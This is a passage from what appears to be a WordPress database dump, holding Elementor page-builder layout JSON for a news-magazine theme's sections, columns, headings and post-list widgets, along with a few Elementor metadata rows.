o\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1197,437,'_elementor_version','0.4'),(1198,437,'_elementor_css','a:3:{s:4:\"time\";i:1508878041;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1200,438,'_elementor_edit_mode','builder'),(1201,438,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_